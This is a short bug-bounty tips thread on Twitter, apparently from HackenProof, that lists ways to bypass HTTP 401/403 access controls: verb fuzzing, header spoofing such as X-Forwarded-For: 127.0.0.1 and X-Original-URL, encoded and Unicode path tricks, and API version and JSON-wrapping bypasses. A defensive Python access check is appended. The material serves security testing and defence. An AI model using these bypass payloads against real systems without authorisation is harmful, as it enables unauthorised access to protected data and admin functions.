HackenProof

@HackenProof

6 Tweets 121 reads Mar 01, 2023
Vuln: 403 & 401 Bypasses
Severity: High
HTTP 401 and 403 are both status codes that indicate that a client's request to a server was not successful.
401 -- client provides no credentials or invalid credentials
403 -- not enough privileges
#bugbountytips #securitytips
1/n
Techniques to bypass 403 & 401:
HTTP Verbs/Methods Fuzzing:
Try using different verbs to access the file: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
Using an HTTP header such as:
X-HTTP-Method-Override: PUT can override the verb used.
2/n
HTTP Headers Fuzzing:
- Change Host header to an arbitrary value
- Try to use other User Agents to access the resource.
- Fuzz HTTP Headers:
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
etc.
3/n
If the path is protected you can try to bypass the path protection using these other headers:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
Remove the Host header and maybe you will be able to bypass the protection.
4/n
Path Fuzzing:
Try using /%2e/path (if the access is blocked by a proxy, this could bypass the protection)
Try /%252e/path (double URL encode)
Try Unicode bypass: /%ef%bc%8fpath (the URL-encoded chars are like "/")
Other path bypasses:
5/n
API bypasses:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{"id":111} --> 401 Unauthorized
{"id":[111]} --> 200 OK
{"id":111} --> 401 Unauthorized
{"id":{"id":111}} --> 200 OK
6/6
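
The path and header tricks above work when the access check compares the raw request path or trusts client-supplied headers. As an added example (not part of the original thread), here is a server-side check that canonicalises the path before deciding and refuses override headers; the /admin policy, the function names and the 400 responses are assumptions made for the illustration:

```python
import posixpath
import unicodedata
from urllib.parse import unquote

# Assumed policy for this example: everything under /admin needs an admin session.
PROTECTED_PREFIXES = ("/admin",)
# Headers from the thread that rewrite the URL or verb behind the access check.
OVERRIDE_HEADERS = {"x-original-url", "x-rewrite-url", "x-http-method-override"}


def canonical_path(raw_path, max_rounds=5):
    """Reduce a request path to the form the application will finally route on."""
    path = raw_path
    for _ in range(max_rounds):
        # Undo one layer of percent-encoding, then fold lookalikes such as
        # U+FF0F (fullwidth solidus, %ef%bc%8f) to their ASCII form.
        decoded = unicodedata.normalize("NFKC", unquote(path))
        if decoded == path:
            break
        path = decoded
    else:
        raise ValueError("path is still encoded after %d rounds" % max_rounds)
    # Collapse duplicate leading slashes, then resolve "." and ".." segments.
    return posixpath.normpath("/" + path.lstrip("/"))


def authorize(method, raw_path, headers, is_admin):
    """Return the HTTP status the access-control layer would answer with.

    The decision depends only on the canonical path and the session. The verb
    and client-supplied IP headers (X-Forwarded-For etc.) are never consulted,
    so changing them cannot change the outcome.
    """
    if {name.lower() for name in headers} & OVERRIDE_HEADERS:
        return 400  # refuse instead of letting a later layer honour the override
    try:
        path = canonical_path(raw_path)
    except ValueError:
        return 400
    protected = any(path == p or path.startswith(p + "/") for p in PROTECTED_PREFIXES)
    if protected and not is_admin:
        return 403
    return 200
```

Running the authorization decision on the same canonical path the router uses is what closes the proxy/application mismatch that the encoded variants rely on.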
